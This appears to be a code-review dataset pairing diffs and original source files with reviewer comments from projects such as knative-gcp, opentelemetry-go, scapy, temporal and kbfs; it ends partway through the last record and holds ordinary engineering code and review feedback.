patch
stringlengths 17
31.2k
| y
int64 1
1
| oldf
stringlengths 0
2.21M
| idx
int64 1
1
| id
int64 4.29k
68.4k
| msg
stringlengths 8
843
| proj
stringclasses 212
values | lang
stringclasses 9
values |
---|---|---|---|---|---|---|---|
@@ -19,10 +19,10 @@ package v1alpha1
import (
"context"
+ "github.com/google/knative-gcp/pkg/logging"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/equality"
"knative.dev/eventing/pkg/apis/messaging"
- "knative.dev/eventing/pkg/logging"
"knative.dev/pkg/apis"
"github.com/google/knative-gcp/pkg/apis/configs/gcpauth" | 1 | /*
Copyright 2019 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha1
import (
"context"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/equality"
"knative.dev/eventing/pkg/apis/messaging"
"knative.dev/eventing/pkg/logging"
"knative.dev/pkg/apis"
"github.com/google/knative-gcp/pkg/apis/configs/gcpauth"
"github.com/google/knative-gcp/pkg/apis/duck"
"github.com/google/knative-gcp/pkg/apis/messaging/internal"
metadataClient "github.com/google/knative-gcp/pkg/gclient/metadata"
)
func (c *Channel) SetDefaults(ctx context.Context) {
ctx = apis.WithinParent(ctx, c.ObjectMeta)
// We need to set this to the _stored_ version of the Channel. If we set to anything other than
// the stored version, then when reading the stored version, conversion won't be called so
// nothing will set it to the stored version.
// Note that if a user sends a bad version of this annotation (e.g. sets it to v1beta1), then we
// won't overwrite their bad input. This is because the webhook:
// 1. Reads the stored version.
// 2. Converts to the desired version.
// 3. Defaults the desired version.
// So we don't know if the user or the converter put the value here, therefore we are forced to
// assume it was the converter and shouldn't change it.
if c.Annotations == nil {
c.Annotations = make(map[string]string, 1)
}
if _, present := c.Annotations[messaging.SubscribableDuckVersionAnnotation]; !present {
c.Annotations[messaging.SubscribableDuckVersionAnnotation] = internal.StoredChannelVersion
}
c.Spec.SetDefaults(ctx)
duck.SetClusterNameAnnotation(&c.ObjectMeta, metadataClient.NewDefaultMetadataClient())
}
func (cs *ChannelSpec) SetDefaults(ctx context.Context) {
ad := gcpauth.FromContextOrDefaults(ctx).GCPAuthDefaults
if ad == nil {
// TODO This should probably error out, rather than silently allow in non-defaulted COs.
logging.FromContext(ctx).Error("Failed to get the GCPAuthDefaults")
return
}
if cs.ServiceAccountName == "" && cs.Secret == nil || equality.Semantic.DeepEqual(cs.Secret, &corev1.SecretKeySelector{}) {
cs.ServiceAccountName = ad.KSA(apis.ParentMeta(ctx).Namespace)
cs.Secret = ad.Secret(apis.ParentMeta(ctx).Namespace)
}
}
| 1 | 17,867 | did we move the eventing logging here? Probably the eventing logging was removing and they are now using the pkg logging in eventing. If that is the case, we should do the same here | google-knative-gcp | go |
@@ -50,8 +50,7 @@ type Filter func(*http.Request) bool
// the mux are wrapped with WithRouteTag. A Handler will add various attributes
// to the span using the core.Keys defined in this package.
type Handler struct {
- operation string
- handler http.Handler
+ handler http.Handler
tracer trace.Tracer
props propagation.Propagators | 1 | // Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package othttp
import (
"io"
"net/http"
"go.opentelemetry.io/otel/api/core"
"go.opentelemetry.io/otel/api/global"
"go.opentelemetry.io/otel/api/propagation"
"go.opentelemetry.io/otel/api/trace"
)
var _ http.Handler = &Handler{}
// Attribute keys that the Handler can add to a span.
const (
HostKey = core.Key("http.host") // the http host (http.Request.Host)
MethodKey = core.Key("http.method") // the http method (http.Request.Method)
PathKey = core.Key("http.path") // the http path (http.Request.URL.Path)
URLKey = core.Key("http.url") // the http url (http.Request.URL.String())
UserAgentKey = core.Key("http.user_agent") // the http user agent (http.Request.UserAgent())
RouteKey = core.Key("http.route") // the http route (ex: /users/:id)
StatusCodeKey = core.Key("http.status_code") // if set, the http status
ReadBytesKey = core.Key("http.read_bytes") // if anything was read from the request body, the total number of bytes read
ReadErrorKey = core.Key("http.read_error") // If an error occurred while reading a request, the string of the error (io.EOF is not recorded)
WroteBytesKey = core.Key("http.wrote_bytes") // if anything was written to the response writer, the total number of bytes written
WriteErrorKey = core.Key("http.write_error") // if an error occurred while writing a reply, the string of the error (io.EOF is not recorded)
)
// Filter is a predicate used to determine whether a given http.request should
// be traced. A Filter must return true if the request should be traced.
type Filter func(*http.Request) bool
// Handler is http middleware that corresponds to the http.Handler interface and
// is designed to wrap a http.Mux (or equivalent), while individual routes on
// the mux are wrapped with WithRouteTag. A Handler will add various attributes
// to the span using the core.Keys defined in this package.
type Handler struct {
operation string
handler http.Handler
tracer trace.Tracer
props propagation.Propagators
spanStartOptions []trace.StartOption
readEvent bool
writeEvent bool
filters []Filter
}
// Option function used for setting *optional* Handler properties
type Option func(*Handler)
// WithTracer configures the Handler with a specific tracer. If this option
// isn't specified then the global tracer is used.
func WithTracer(tracer trace.Tracer) Option {
return func(h *Handler) {
h.tracer = tracer
}
}
// WithPublicEndpoint configures the Handler to link the span with an incoming
// span context. If this option is not provided, then the association is a child
// association instead of a link.
func WithPublicEndpoint() Option {
return func(h *Handler) {
h.spanStartOptions = append(h.spanStartOptions, trace.WithNewRoot())
}
}
// WithPropagators configures the Handler with specific propagators. If this
// option isn't specified then
// go.opentelemetry.io/otel/api/global.Propagators are used.
func WithPropagators(ps propagation.Propagators) Option {
return func(h *Handler) {
h.props = ps
}
}
// WithSpanOptions configures the Handler with an additional set of
// trace.StartOptions, which are applied to each new span.
func WithSpanOptions(opts ...trace.StartOption) Option {
return func(h *Handler) {
h.spanStartOptions = append(h.spanStartOptions, opts...)
}
}
// WithFilter adds a filter to the list of filters used by the handler.
// If any filter indicates to exclude a request then the request will not be
// traced. All filters must allow a request to be traced for a Span to be created.
// If no filters are provided then all requests are traced.
// Filters will be invoked for each processed request, it is advised to make them
// simple and fast.
func WithFilter(f Filter) Option {
return func(h *Handler) {
h.filters = append(h.filters, f)
}
}
type event int
// Different types of events that can be recorded, see WithMessageEvents
const (
ReadEvents event = iota
WriteEvents
)
// WithMessageEvents configures the Handler to record the specified events
// (span.AddEvent) on spans. By default only summary attributes are added at the
// end of the request.
//
// Valid events are:
// * ReadEvents: Record the number of bytes read after every http.Request.Body.Read
// using the ReadBytesKey
// * WriteEvents: Record the number of bytes written after every http.ResponeWriter.Write
// using the WriteBytesKey
func WithMessageEvents(events ...event) Option {
return func(h *Handler) {
for _, e := range events {
switch e {
case ReadEvents:
h.readEvent = true
case WriteEvents:
h.writeEvent = true
}
}
}
}
// NewHandler wraps the passed handler, functioning like middleware, in a span
// named after the operation and with any provided HandlerOptions.
func NewHandler(handler http.Handler, operation string, opts ...Option) http.Handler {
h := Handler{handler: handler, operation: operation}
defaultOpts := []Option{
WithTracer(global.Tracer("go.opentelemetry.io/plugin/othttp")),
WithPropagators(global.Propagators()),
WithSpanOptions(trace.WithSpanKind(trace.SpanKindServer)),
}
for _, opt := range append(defaultOpts, opts...) {
opt(&h)
}
return &h
}
// ServeHTTP serves HTTP requests (http.Handler)
func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
for _, f := range h.filters {
if !f(r) {
// Simply pass through to the handler if a filter rejects the request
h.handler.ServeHTTP(w, r)
return
}
}
opts := append([]trace.StartOption{}, h.spanStartOptions...) // start with the configured options
ctx := propagation.ExtractHTTP(r.Context(), h.props, r.Header)
ctx, span := h.tracer.Start(ctx, h.operation, opts...)
defer span.End()
readRecordFunc := func(int64) {}
if h.readEvent {
readRecordFunc = func(n int64) {
span.AddEvent(ctx, "read", ReadBytesKey.Int64(n))
}
}
bw := bodyWrapper{ReadCloser: r.Body, record: readRecordFunc}
r.Body = &bw
writeRecordFunc := func(int64) {}
if h.writeEvent {
writeRecordFunc = func(n int64) {
span.AddEvent(ctx, "write", WroteBytesKey.Int64(n))
}
}
rww := &respWriterWrapper{ResponseWriter: w, record: writeRecordFunc, ctx: ctx, props: h.props}
// Setup basic span attributes before calling handler.ServeHTTP so that they
// are available to be mutated by the handler if needed.
span.SetAttributes(
HostKey.String(r.Host),
MethodKey.String(r.Method),
PathKey.String(r.URL.Path),
URLKey.String(r.URL.String()),
UserAgentKey.String(r.UserAgent()),
)
h.handler.ServeHTTP(rww, r.WithContext(ctx))
setAfterServeAttributes(span, bw.read, rww.written, int64(rww.statusCode), bw.err, rww.err)
}
func setAfterServeAttributes(span trace.Span, read, wrote, statusCode int64, rerr, werr error) {
kv := make([]core.KeyValue, 0, 5)
// TODO: Consider adding an event after each read and write, possibly as an
// option (defaulting to off), so as to not create needlessly verbose spans.
if read > 0 {
kv = append(kv, ReadBytesKey.Int64(read))
}
if rerr != nil && rerr != io.EOF {
kv = append(kv, ReadErrorKey.String(rerr.Error()))
}
if wrote > 0 {
kv = append(kv, WroteBytesKey.Int64(wrote))
}
if statusCode > 0 {
kv = append(kv, StatusCodeKey.Int64(statusCode))
}
if werr != nil && werr != io.EOF {
kv = append(kv, WriteErrorKey.String(werr.Error()))
}
span.SetAttributes(kv...)
}
// WithRouteTag annotates a span with the provided route name using the
// RouteKey Tag.
func WithRouteTag(route string, h http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
span := trace.SpanFromContext(r.Context())
span.SetAttributes(RouteKey.String(route))
h.ServeHTTP(w, r)
})
}
| 1 | 11,773 | I think that `Handler` should preserve the `operation` member and the span formatter should receive the operation name string as a parameter too, otherwise the `operation` parameter in the `NewHandler` function becomes useless if we pass a custom span formatter. Also, shouldn't it be called `spanNameFormatter`? | open-telemetry-opentelemetry-go | go |
@@ -67,7 +67,7 @@ class HSRPmd5(Packet):
ByteEnumField("algo", 0, {1: "MD5"}),
ByteField("padding", 0x00),
XShortField("flags", 0x00),
- IPField("sourceip", None),
+ IPField("sourceip", "127.0.0.1"),
XIntField("keyid", 0x00),
StrFixedLenField("authdigest", "\00" * 16, 16)]
| 1 | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
#############################################################################
## ##
## hsrp.py --- HSRP protocol support for Scapy ##
## ##
## Copyright (C) 2010 Mathieu RENARD mathieu.renard(at)gmail.com ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation; version 2. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
## HSRP Version 1
## Ref. RFC 2281
## HSRP Version 2
## Ref. http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html
##
## $Log: hsrp.py,v $
## Revision 0.2 2011/05/01 15:23:34 mrenard
## Cleanup code
"""
HSRP (Hot Standby Router Protocol): proprietary redundancy protocol for Cisco routers.
"""
from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import DestIPField, UDP
from scapy.layers.inet6 import DestIP6Field
class HSRP(Packet):
name = "HSRP"
fields_desc = [
ByteField("version", 0),
ByteEnumField("opcode", 0, {0: "Hello", 1: "Coup", 2: "Resign", 3: "Advertise"}),
ByteEnumField("state", 16, {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}),
ByteField("hellotime", 3),
ByteField("holdtime", 10),
ByteField("priority", 120),
ByteField("group", 1),
ByteField("reserved", 0),
StrFixedLenField("auth", "cisco" + "\00" * 3, 8),
IPField("virtualIP", "192.168.1.1")]
def guess_payload_class(self, payload):
if self.underlayer.len > 28:
return HSRPmd5
else:
return Packet.guess_payload_class(self, payload)
class HSRPmd5(Packet):
name = "HSRP MD5 Authentication"
fields_desc = [
ByteEnumField("type", 4, {4: "MD5 authentication"}),
ByteField("len", None),
ByteEnumField("algo", 0, {1: "MD5"}),
ByteField("padding", 0x00),
XShortField("flags", 0x00),
IPField("sourceip", None),
XIntField("keyid", 0x00),
StrFixedLenField("authdigest", "\00" * 16, 16)]
def post_build(self, p, pay):
if self.len is None and pay:
l = len(pay)
p = p[:1] + hex(l)[30:] + p[30:]
return p
bind_layers(UDP, HSRP, dport=1985, sport=1985)
bind_layers(UDP, HSRP, dport=2029, sport=2029)
DestIPField.bind_addr(UDP, "224.0.0.2", dport=1985)
DestIP6Field.bind_addr(UDP, "ff02::66", dport=2029)
| 1 | 9,226 | Can you merge #466? That would make the current `None` default value working and more relevant that `"127.0.0.1"`. | secdev-scapy | py |
@@ -96,14 +96,15 @@ func (v *Validator) Validate(searchAttributes *commonpb.SearchAttributes, namesp
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
- if IsReservedField(saName) {
- return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is Temporal reserved field name", saName))
+ if !typeMap.IsDefined(saName) {
+ return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
}
- saType, err := typeMap.GetType(saName)
+ saType, err := typeMap.getType(saName, customCategory|predefinedCategory)
if err != nil {
- return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
+ return serviceerror.NewInvalidArgument(fmt.Sprintf("%s attribute can't be set in SearchAttributes: reserved field name", saName))
}
+
_, err = DecodeValue(saPayload, saType)
if err != nil {
var invalidValue interface{} | 1 | // The MIT License
//
// Copyright (c) 2020 Temporal Technologies Inc. All rights reserved.
//
// Copyright (c) 2020 Uber Technologies, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
package searchattribute
import (
"errors"
"fmt"
commonpb "go.temporal.io/api/common/v1"
"go.temporal.io/api/serviceerror"
"go.temporal.io/server/common/dynamicconfig"
"go.temporal.io/server/common/log"
"go.temporal.io/server/common/log/tag"
"go.temporal.io/server/common/payload"
)
type (
// Validator is used to validate search attributes
Validator struct {
logger log.Logger
searchAttributesProvider Provider
searchAttributesNumberOfKeysLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
searchAttributesSizeOfValueLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
searchAttributesTotalSizeLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
}
)
var (
ErrExceedSizeLimit = errors.New("exceeds size limit")
)
// NewValidator create Validator
func NewValidator(
logger log.Logger,
searchAttributesProvider Provider,
searchAttributesNumberOfKeysLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
searchAttributesSizeOfValueLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
searchAttributesTotalSizeLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
) *Validator {
return &Validator{
logger: logger,
searchAttributesProvider: searchAttributesProvider,
searchAttributesNumberOfKeysLimit: searchAttributesNumberOfKeysLimit,
searchAttributesSizeOfValueLimit: searchAttributesSizeOfValueLimit,
searchAttributesTotalSizeLimit: searchAttributesTotalSizeLimit,
}
}
// ValidateAndLog validate search attributes are valid for writing and not exceed limits
func (v *Validator) ValidateAndLog(searchAttributes *commonpb.SearchAttributes, namespace string, indexName string) error {
err := v.Validate(searchAttributes, namespace, indexName)
if err != nil {
v.logger.Warn("Search attributes are invalid.", tag.Error(err), tag.WorkflowNamespace(namespace), tag.ESIndex(indexName))
}
return err
}
// Validate validate search attributes are valid for writing.
func (v *Validator) Validate(searchAttributes *commonpb.SearchAttributes, namespace string, indexName string) error {
if searchAttributes == nil {
return nil
}
lengthOfFields := len(searchAttributes.GetIndexedFields())
if lengthOfFields > v.searchAttributesNumberOfKeysLimit(namespace) {
return serviceerror.NewInvalidArgument(fmt.Sprintf("number of search attributes %d exceeds limit %d", lengthOfFields, v.searchAttributesNumberOfKeysLimit(namespace)))
}
typeMap, err := v.searchAttributesProvider.GetSearchAttributes(indexName, false)
if err != nil {
return serviceerror.NewInvalidArgument(fmt.Sprintf("unable to get search attributes from cluster metadata: %v", err))
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
if IsReservedField(saName) {
return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is Temporal reserved field name", saName))
}
saType, err := typeMap.GetType(saName)
if err != nil {
return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
}
_, err = DecodeValue(saPayload, saType)
if err != nil {
var invalidValue interface{}
if err := payload.Decode(saPayload, &invalidValue); err != nil {
invalidValue = fmt.Sprintf("value from <%s>", saPayload.String())
}
return serviceerror.NewInvalidArgument(fmt.Sprintf("%v is not a valid value for search attribute %s of type %s", invalidValue, saName, saType))
}
}
return nil
}
// ValidateSize validate search attributes are valid for writing and not exceed limits
func (v *Validator) ValidateSize(searchAttributes *commonpb.SearchAttributes, namespace string) error {
if searchAttributes == nil {
return nil
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
if len(saPayload.GetData()) > v.searchAttributesSizeOfValueLimit(namespace) {
return fmt.Errorf("search attribute %s value of size %d: %w %d", saName, len(saPayload.GetData()), ErrExceedSizeLimit, v.searchAttributesSizeOfValueLimit(namespace))
}
}
if searchAttributes.Size() > v.searchAttributesTotalSizeLimit(namespace) {
return fmt.Errorf("total size of search attributes %d: %w %d", searchAttributes.Size(), ErrExceedSizeLimit, v.searchAttributesTotalSizeLimit(namespace))
}
return nil
}
| 1 | 11,951 | is reserved filed name the only possible reason this could fail? | temporalio-temporal | go |
@@ -169,6 +169,10 @@ func defaultLogPath(ctx Context) string {
// DefaultInitParams returns default init params
func DefaultInitParams(ctx Context) InitParams {
+ journalEnv := os.Getenv("KBFS_ENABLE_JOURNAL")
+ if journalEnv == "" {
+ journalEnv = "true"
+ }
return InitParams{
Debug: BoolForString(os.Getenv("KBFS_DEBUG")),
BServerAddr: defaultBServer(ctx), | 1 | // Copyright 2016 Keybase Inc. All rights reserved.
// Use of this source code is governed by a BSD
// license that can be found in the LICENSE file.
package libkbfs
import (
"context"
"errors"
"flag"
"fmt"
"os"
"os/signal"
"path/filepath"
"strings"
"time"
"github.com/keybase/client/go/libkb"
"github.com/keybase/client/go/logger"
"github.com/keybase/client/go/protocol/keybase1"
"github.com/keybase/go-framed-msgpack-rpc/rpc"
"github.com/keybase/kbfs/kbfsmd"
)
const (
// InitDefaultString is the normal mode for when KBFS data will be
// read and written.
InitDefaultString string = "default"
// InitMinimalString is for when KBFS will only be used as a MD
// lookup layer (e.g., for chat on mobile).
InitMinimalString = "minimal"
// InitSingleOpString is for when KBFS will only be used for a
// single logical operation (e.g., as a git remote helper).
InitSingleOpString = "singleOp"
)
// InitParams contains the initialization parameters for Init(). It is
// usually filled in by the flags parser passed into AddFlags().
type InitParams struct {
// Whether to print debug messages.
Debug bool
// If non-empty, the host:port of the block server. If empty,
// a default value is used depending on the run mode. Can also
// be "memory" for an in-memory test server or
// "dir:/path/to/dir" for an on-disk test server.
BServerAddr string
// If non-empty the host:port of the metadata server. If
// empty, a default value is used depending on the run mode.
// Can also be "memory" for an in-memory test server or
// "dir:/path/to/dir" for an on-disk test server.
MDServerAddr string
// If non-zero, specifies the capacity (in bytes) of the block cache. If
// zero, the capacity is set using getDefaultBlockCacheCapacity().
CleanBlockCacheCapacity uint64
// Fake local user name.
LocalUser string
// Where to put favorites. Has an effect only when LocalUser
// is non-empty, in which case it must be either "memory" or
// "dir:/path/to/dir".
LocalFavoriteStorage string
// TLFValidDuration is the duration that TLFs are valid
// before marked for lazy revalidation.
TLFValidDuration time.Duration
// MetadataVersion is the default version of metadata to use
// when creating new metadata.
MetadataVersion kbfsmd.MetadataVer
// LogToFile if true, logs to a default file location.
LogToFile bool
// LogFileConfig tells us where to log and rotation config.
LogFileConfig logger.LogFileConfig
// TLFJournalBackgroundWorkStatus is the status to use to
// pass into JournalServer.enableJournaling. Only has an effect when
// EnableJournal is non-empty.
TLFJournalBackgroundWorkStatus TLFJournalBackgroundWorkStatus
// CreateSimpleFSInstance creates a SimpleFSInterface from config.
// If this is nil then simplefs will be omitted in the rpc api.
CreateSimpleFSInstance func(Config) keybase1.SimpleFSInterface
// CreateGitHandlerInstance creates a KBFSGitInterface from config.
// If this is nil then git will be omitted in the rpc api.
CreateGitHandlerInstance func(Config) keybase1.KBFSGitInterface
// EnableJournal enables journaling.
EnableJournal bool
// DiskCacheMode specifies which mode to start the disk cache.
DiskCacheMode DiskCacheMode
// StorageRoot, if non-empty, points to a local directory to put its local
// databases for things like the journal or disk cache.
StorageRoot string
// BGFlushPeriod indicates how long to wait for a batch to fill up
// before syncing a set of changes on a TLF to the servers.
BGFlushPeriod time.Duration
// BGFlushDirOpBatchSize indicates how many directory operations
// in a TLF should be batched together in a single background
// flush.
BGFlushDirOpBatchSize int
// Mode describes how KBFS should initialize itself.
Mode string
}
// defaultBServer returns the default value for the -bserver flag.
func defaultBServer(ctx Context) string {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return memoryAddr
case libkb.StagingRunMode:
return `
bserver-0.dev.keybase.io:443,bserver-1.dev.keybase.io:443`
case libkb.ProductionRunMode:
return `
bserver-0.kbfs.keybaseapi.com:443,bserver-1.kbfs.keybaseapi.com:443;
bserver-0.kbfs.keybase.io:443,bserver-1.kbfs.keybase.io:443`
default:
return ""
}
}
// defaultMDServer returns the default value for the -mdserver flag.
func defaultMDServer(ctx Context) string {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return memoryAddr
case libkb.StagingRunMode:
return `
mdserver-0.dev.keybase.io:443,mdserver-1.dev.keybase.io:443`
case libkb.ProductionRunMode:
return `
mdserver-0.kbfs.keybaseapi.com:443,mdserver-1.kbfs.keybaseapi.com:443;
mdserver-0.kbfs.keybase.io:443,mdserver-1.kbfs.keybase.io:443`
default:
return ""
}
}
// defaultMetadataVersion returns the default metadata version per run mode.
func defaultMetadataVersion(ctx Context) kbfsmd.MetadataVer {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return kbfsmd.ImplicitTeamsVer
case libkb.StagingRunMode:
return kbfsmd.ImplicitTeamsVer
case libkb.ProductionRunMode:
// TODO(KBFS-2621): flip this.
return kbfsmd.SegregatedKeyBundlesVer
default:
return kbfsmd.ImplicitTeamsVer
}
}
func defaultLogPath(ctx Context) string {
return filepath.Join(ctx.GetLogDir(), libkb.KBFSLogFileName)
}
// DefaultInitParams returns default init params
func DefaultInitParams(ctx Context) InitParams {
return InitParams{
Debug: BoolForString(os.Getenv("KBFS_DEBUG")),
BServerAddr: defaultBServer(ctx),
MDServerAddr: defaultMDServer(ctx),
TLFValidDuration: tlfValidDurationDefault,
MetadataVersion: defaultMetadataVersion(ctx),
LogFileConfig: logger.LogFileConfig{
MaxAge: 30 * 24 * time.Hour,
MaxSize: 128 * 1024 * 1024,
MaxKeepFiles: 3,
},
TLFJournalBackgroundWorkStatus: TLFJournalBackgroundWorkEnabled,
StorageRoot: ctx.GetDataDir(),
BGFlushPeriod: bgFlushPeriodDefault,
BGFlushDirOpBatchSize: bgFlushDirOpBatchSizeDefault,
EnableJournal: true,
DiskCacheMode: DiskCacheModeLocal,
Mode: InitDefaultString,
}
}
// AddFlagsWithDefaults adds libkbfs flags to the given FlagSet, given
// a set of default flags. Returns an InitParams that will be filled
// in once the given FlagSet is parsed.
func AddFlagsWithDefaults(
flags *flag.FlagSet, defaultParams InitParams,
defaultLogPath string) *InitParams {
var params InitParams
flags.BoolVar(¶ms.Debug, "debug", defaultParams.Debug,
"Print debug messages")
flags.StringVar(¶ms.BServerAddr, "bserver", defaultParams.BServerAddr,
"host:port of the block server, 'memory', or 'dir:/path/to/dir'")
flags.StringVar(¶ms.MDServerAddr, "mdserver",
defaultParams.MDServerAddr,
"host:port of the metadata server, 'memory', or 'dir:/path/to/dir'")
flags.StringVar(¶ms.LocalUser, "localuser", defaultParams.LocalUser,
"fake local user")
flags.StringVar(¶ms.LocalFavoriteStorage, "local-fav-storage",
defaultParams.LocalFavoriteStorage,
"where to put favorites; used only when -localuser is set, then must "+
"either be 'memory' or 'dir:/path/to/dir'")
flags.DurationVar(¶ms.TLFValidDuration, "tlf-valid",
defaultParams.TLFValidDuration,
"time tlfs are valid before redoing identification")
flags.BoolVar(¶ms.LogToFile, "log-to-file", defaultParams.LogToFile,
fmt.Sprintf("Log to default file: %s", defaultLogPath))
flags.StringVar(¶ms.LogFileConfig.Path, "log-file", "",
"Path to log file")
flags.DurationVar(¶ms.LogFileConfig.MaxAge, "log-file-max-age",
defaultParams.LogFileConfig.MaxAge,
"Maximum age of a log file before rotation")
params.LogFileConfig.MaxSize = defaultParams.LogFileConfig.MaxSize
flags.Var(SizeFlag{¶ms.LogFileConfig.MaxSize}, "log-file-max-size",
"Maximum size of a log file before rotation")
// The default is to *DELETE* old log files for kbfs.
flags.IntVar(¶ms.LogFileConfig.MaxKeepFiles, "log-file-max-keep-files",
defaultParams.LogFileConfig.MaxKeepFiles, "Maximum number of log "+
"files for this service, older ones are deleted. 0 for infinite.")
flags.Uint64Var(¶ms.CleanBlockCacheCapacity, "clean-bcache-cap",
defaultParams.CleanBlockCacheCapacity,
"If non-zero, specify the capacity of clean block cache. If zero, "+
"the capacity is set based on system RAM.")
flags.StringVar(¶ms.StorageRoot, "storage-root",
defaultParams.StorageRoot, "Specifies where Keybase will store its "+
"local databases for the journal and disk cache.")
params.DiskCacheMode = defaultParams.DiskCacheMode
flags.Var(¶ms.DiskCacheMode, "disk-cache-mode",
"Sets the mode for the disk cache. If 'local', then it uses a "+
"subdirectory of -storage-root to store the cache. If 'remote', "+
"then it connects to the local KBFS instance and delegates disk "+
"cache operations to it.")
flags.BoolVar(¶ms.EnableJournal, "enable-journal",
defaultParams.EnableJournal, "Enables write journaling for TLFs.")
// No real need to enable setting
// params.TLFJournalBackgroundWorkStatus via a flag.
params.TLFJournalBackgroundWorkStatus =
defaultParams.TLFJournalBackgroundWorkStatus
flags.DurationVar(¶ms.BGFlushPeriod, "sync-batch-period",
defaultParams.BGFlushPeriod,
"The amount of time to wait before syncing data in a TLF, if the "+
"batch size doesn't fill up.")
flags.IntVar((*int)(¶ms.BGFlushDirOpBatchSize), "sync-batch-size",
int(defaultParams.BGFlushDirOpBatchSize),
"The number of unflushed directory operations in a TLF that will "+
"trigger an immediate data sync.")
flags.IntVar((*int)(¶ms.MetadataVersion), "md-version",
int(defaultParams.MetadataVersion),
"Metadata version to use when creating new metadata")
flags.StringVar(¶ms.Mode, "mode", defaultParams.Mode,
fmt.Sprintf("Overall initialization mode for KBFS, indicating how "+
"heavy-weight it can be (%s, %s or %s)", InitDefaultString,
InitMinimalString, InitSingleOpString))
return ¶ms
}
// AddFlags adds libkbfs flags to the given FlagSet. Returns an
// InitParams that will be filled in once the given FlagSet is parsed.
func AddFlags(flags *flag.FlagSet, ctx Context) *InitParams {
return AddFlagsWithDefaults(
flags, DefaultInitParams(ctx), defaultLogPath(ctx))
}
// GetRemoteUsageString returns a string describing the flags to use
// to run against remote KBFS servers.
func GetRemoteUsageString() string {
return ` [-debug]
[-bserver=host:port] [-mdserver=host:port]
[-log-to-file] [-log-file=path/to/file] [-clean-bcache-cap=0]`
}
// GetLocalUsageString returns a string describing the flags to use to
// run in a local testing environment.
func GetLocalUsageString() string {
return ` [-debug]
[-bserver=(memory | dir:/path/to/dir | host:port)]
[-mdserver=(memory | dir:/path/to/dir | host:port)]
[-localuser=<user>]
[-local-fav-storage=(memory | dir:/path/to/dir)]
[-log-to-file] [-log-file=path/to/file] [-clean-bcache-cap=0]`
}
// GetDefaultsUsageString returns a string describing the default
// values of flags based on the run mode.
func GetDefaultsUsageString(ctx Context) string {
runMode := ctx.GetRunMode()
defaultBServer := defaultBServer(ctx)
defaultMDServer := defaultMDServer(ctx)
return fmt.Sprintf(` (KEYBASE_RUN_MODE=%s)
-bserver=%s
-mdserver=%s`,
runMode, defaultBServer, defaultMDServer)
}
const memoryAddr = "memory"
const dirAddrPrefix = "dir:"
func parseRootDir(addr string) (string, bool) {
if !strings.HasPrefix(addr, dirAddrPrefix) {
return "", false
}
serverRootDir := addr[len(dirAddrPrefix):]
if len(serverRootDir) == 0 {
return "", false
}
return serverRootDir, true
}
func makeMDServer(config Config, mdserverAddr string,
rpcLogFactory rpc.LogFactory, log logger.Logger) (
MDServer, error) {
if mdserverAddr == memoryAddr {
log.Debug("Using in-memory mdserver")
// local in-memory MD server
